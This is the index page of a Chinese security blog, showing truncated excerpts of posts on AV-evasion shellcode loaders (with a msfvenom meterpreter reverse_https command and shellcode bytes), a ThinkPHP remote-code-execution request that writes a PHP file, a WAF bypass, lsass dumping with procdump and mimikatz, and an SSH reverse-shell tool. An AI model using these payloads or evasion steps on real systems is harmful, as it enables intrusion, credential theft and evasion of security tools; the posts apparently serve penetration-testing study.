avatar
Articles
18
Tags
16
Categories
7

Home
Archives
Tags
Categories
About
卡卡罗特取西经
Home
Archives
Tags
Categories
About

卡卡罗特取西经

DOS下16位汇编学习
Created2025-08-05|免杀研究
前言汇编语言不学总感觉差点东西,那就开整,我用的是王爽老师那本汇编语言第三版,也可以看B站上“零点Boy”老师的视频课程,参考的也是王爽老师那本汇编语言讲的 电子版:这里 本文只是简单记录下这段时间的学习感受 总结汇编语言是和操作系统强相关的低级语言,DOS下16位汇编、Windows下32位汇编、Linux下汇编可以说是“三门语言”,不像C、C++、JAVA这种高级语言,是跨平台的。王爽老师那本汇编语言讲的就是DOS下16位汇编,现在到处都是64的Windows,16位的DOS汇编属实有点过时了,但是知识都是一点点演化的,想了解汇编是怎么来的,这本书的基础部分我觉得还是有用的 16位DOS汇编寄存器是16位的,但寻址总线是20位的,所以CPU内部会有一个转换器,转换器的基本逻辑是,将两个16位寄存器(也就是两个16位二进制)经过转换变成一个20位二进制,寻址方式是 段地址:偏移地址 汇编代码之所以看起来像天书,就是因为它有很多隐藏知识,例如下述代码,ds寄存器默认被用来存放段地址,再结合偏移地址,便得到了某个字符串的起始地址,然后对字符串进行异或操作,便可以将大写变为小写,将小写 ...
利用NtReadVirtualMemory实现IAT中规避高危API
Created2025-07-28|免杀研究
前世Win32 APIWin32 API实现最简单的Shellcode Loader如下,代码中包含注释,可以看到每条语句的含义 1234567891011121314151617181920212223242526272829303132333435363738394041#include <windows.h>#include <stdio.h>// msfvenom -p windows/meterpreter/reverse_https lhost=xxx lport=xxx -f cunsigned char shellcode[] ="\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52"..."\x30\x2e\x32\x00\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";int main(){ // 分配内存 LPVOID allocatedMemory = VirtualAlloc(NUL ...
CVE-2024-25600 WordPress Bricks Builder远程代码执行漏洞分析
Created2025-01-06|代码审计
前言朋友圈看到有人转发了一篇“CVE-2024-25600:WordPress Bricks Builder RCE”,感觉挺有意思,点进去看了下,可是从头到尾看得我有点迷糊,本着打破砂锅问到底的原则,本文试图以漏洞挖掘者的视角详细分析这个漏洞,试着讲清楚漏洞真正的成因,也在分析的过程中发现一些新的小东西,比如漏洞只影响1.9.1及之上的版本,网上都在说影响版本是<=1.9.6,其实应该是1.9.1 <= affected version <= 1.9.6 这里想说句题外话,如果一篇文章看得你云里雾里,那不排除一种可能,这篇文章质量不高~ 0x01 漏洞宏观流程漏洞最终触发点是eval执行了攻击者传入的恶意代码,导致任意代码执行其中参数$php_query_raw是攻击者可控的,路由也是攻击者可控的,最后在权限校验部分仅使用nonce进行权限校验,而nonce会泄露在前端源码中,至此《危险函数 -> 用户输入 -> 对应路由 -> 权限绕过》全部满足,最终导致了前台RCE(实际的细节有些复杂…) pyload如下 123456789101112131 ...
Parallels Desktop虚拟机(PD虚拟机)迁移到VMware Workstation
Created2024-12-29|系统运维
前言工作需要,去现场干活但不能用自己的电脑,考虑将我平时用的虚拟机拷贝过去,但我是intel mac下使用parallels desktop虚拟化的win10,现场是windows机器,pd虚拟机无法导入vmware workstation中,google、知乎、v2ex上各种搜索,不是不完整,就是不可用,最终通过自己尝试和国外一篇博客发现可行的方法,本文记录一下 过程整体思路是,mac下vmware fusion导入pd虚拟机,vmware fusion中将虚拟机导出为ovf格式,最终导入vmware workstation中 步骤1mac下安装好vmware fusion,截止到2024年12月22日,vmware fusion已经免费了,现在连破解许可都不用找了 步骤2vmware fusion直接导入pd虚拟机会报错 1Error23 无法导入虚拟机 需要使用qemu-img转换一下格式,安装qemu-img命令如下 1brew install qemu 我这边安装过程中提示还需要安装什么xcode(记不清了…),需要一并安装,安装后使用如下命令转换(转换之前,虚拟机需要关机) ...
ThinkPHP GetShell WAF绕过
Created2024-11-18|Web打点
分享一个ThinkPHP GetShell时WAF绕过的小技巧 POC以如下POC为例 123456POST /?s=captcha&test=-1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36Content-Type: application/x-www-form-urlencodeds=file_put_contents('system.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert 可能绕过WAF的POC为 123456POST /?s=captcha&test=-1 HTTP/1.1Host: 127.0.0.1User-Agent: M ...
从shiro命令执行到远程桌面登录
Created2024-10-06|Web打点
背景一个shiro命令执行并且有回显的口子,直接打各类内存马均失败,powershell一句话上线CS失败,查看进程发现有360、火绒,考虑到内存马不是我的研究方向,从文件下载方向突破 0x01 突破常规的文件下载方式bitsadmin、certutil、ftp等均被拦截,掏出储备的一个免杀的文件下载方式,可成功下载exe文件,尝试下载免杀远控并执行,发现无法执行(原因未知),改为下载魔改过的免杀冰蝎到对应的web目录下,成功连接webshell 0x02 再突破连接上webshell后,尝试执行远控仍旧失败,看来这条路行不通了,上传procdump抓取lsass的内存,想要下载到本地解密,发现不能下载(猜测可能是AV给拦截了),重新梳理下场景,想到既然是shiro的站点,那可以通过web服务下载文件,将文件移动到web目录后成功下载,随后通过mimikatz解出密码,密码真TM复杂啊,上传魔改过的免杀frp,建立隧道后,远程桌面成功连接 0x03 优化远程桌面连接后,发现屏幕字体非常非常小,应该是我本机虚拟机的分辨率太高导致的,此时可以先修改本机的屏幕分辨率,再远程桌面连接后大小刚刚 ...
Windows命令学习之ICACLS
Created2024-08-15|免杀研究
0x01 前言看到一个免杀下载的方式,其中包含这样一条命令 1icacls %cd% /deny %username%:(OI)(CI)(DE,DC) 之前没接触过icacls,通过这篇笔记好好学习一下 0x02 介绍icacls:修改文件(文件夹)的权限 icacls是cacls和xcacls的增强版(但我在win10中搜索了一下,只搜到cacls,没搜到xcacls) windows中文件(文件夹)的权限分为2种:继承的权限(inherit permission)、明确设置的权限(explicit permission) 可通过执行icacls.exe %cd%来查看当前目录的权限 123456C:\Users\admin\Desktop>icacls.exe %cd%C:\Users\admin\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) DESKTOP-T86MV1G\ ...
移动端渗透测试环境搭建
Created2024-07-15|Web打点
0x01 前言接到一个Android APP渗透的任务,尝试用模拟器抓包发现闪退,看来反模拟器,手里有一台手机,型号是OPPO A57 5G,系统是ColorOS 14,手机和电脑在同一WiFi下,安装好burp证书,配置好代理,尝试抓包,发现无法抓取https包,好吧,开启折腾之旅 oppo安装证书https://www.cnblogs.com/tianpin/p/17503604.html 0x02 手机降级查阅相关资料得知,安卓7.0开始,想抓https包需要将证书装到系统证书目录下,想装到系统证书目录下需要root权限,现在问题变成如何root 之前手欠将ColorOS升级到14,我们都知道版本越高越不利于root,所以第一步是降级,ColorOS官方规定,降级需要一级一级降,不能一次降多级,所以我们要先降到ColorOS 13,再降到ColorOS 12,由于ColorOS最低只能降到手机出厂时的系统,我这边最低只能降到ColorOS 12 ColorOS 14降级到ColorOS 13https://www.ithome.com/0/742/497.htmColorOS ...
自动化连接ssh并反弹shell
Created2024-05-07|内网横向
0x01 应用场景一个命令执行的口子 主机不出网 当前是nobody权限,web目录是root权限,写webshell没权限 通过一个ctf技巧搞了一个webshell,能上传文件但是不能执行命令 通过webshell将fscan上传到/tmp目录下,通过入口的命令执行漏洞执行fscan,发现内网有ssh弱口令 0x02 解决方案已知连接ssh的同时可以执行命令当时的想法是连接ssh,然后执行命令反弹shell,但是连接ssh需要交互式shell,第一时间想到expect,经测试主机上没有expect,然后想到通过python中的pexpect去做这件事,发现目标中的python缺少依赖,如果上传python依赖到对应的依赖库目录太麻烦了,最后想到用go去实现,代码如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950package mainimport ("bytes""fmt""log"&q ...
小程序-多用户微博系统
Created2024-05-07|工具开发
0x01 前言之前有段时间在搞小程序开发,搞来搞去最终放弃了,不过收获还是蛮多的,记得刚入行安全时,一直想学开发,总觉得不懂开发就搞不好安全,现在也算圆了这个执念,学习开发对安全是有帮助的,不过现在想对那时的自己说一句,不用专门学开发也可以把安全搞得好 0x02 简介一个简易的多用户微博系统,每个人都可以在上面留言,欢迎大家留言,地址:https://static-mp-5cacf972-c2bb-47de-9b31-244f0c9e5038.next.bspapp.com/article/#/ 截图如下:
12
avatar
ybdt
Articles
18
Tags
16
Categories
7
Follow Me
Announcement
要想练就绝世武功,就要忍受常人难忍受的痛
Recent Post
DOS下16位汇编学习2025-08-05
利用NtReadVirtualMemory实现IAT中规避高危API2025-07-28
CVE-2024-25600 WordPress Bricks Builder远程代码执行漏洞分析2025-01-06
Parallels Desktop虚拟机(PD虚拟机)迁移到VMware Workstation2024-12-29
ThinkPHP GetShell WAF绕过2024-11-18
Categories
  • Web打点3
  • 代码审计5
  • 免杀研究5
  • 内网横向1
  • 工具开发2
  • 新路历程1
  • 系统运维1
Tags
移动端 API隐藏 Python 虚拟机迁移 微信小程序 WAF绕过 JAVA 汇编 打点思路 Linux PHP ICACLS 心路历程 AV/EDR致盲 环境搭建 免杀对抗
Archives
  • August 20251
  • July 20251
  • January 20251
  • December 20241
  • November 20241
  • October 20241
  • August 20241
  • July 20241
Info
Article :
18
UV :
PV :
Last Update :
©2020 - 2025 By ybdt
Framework Hexo|Theme Butterfly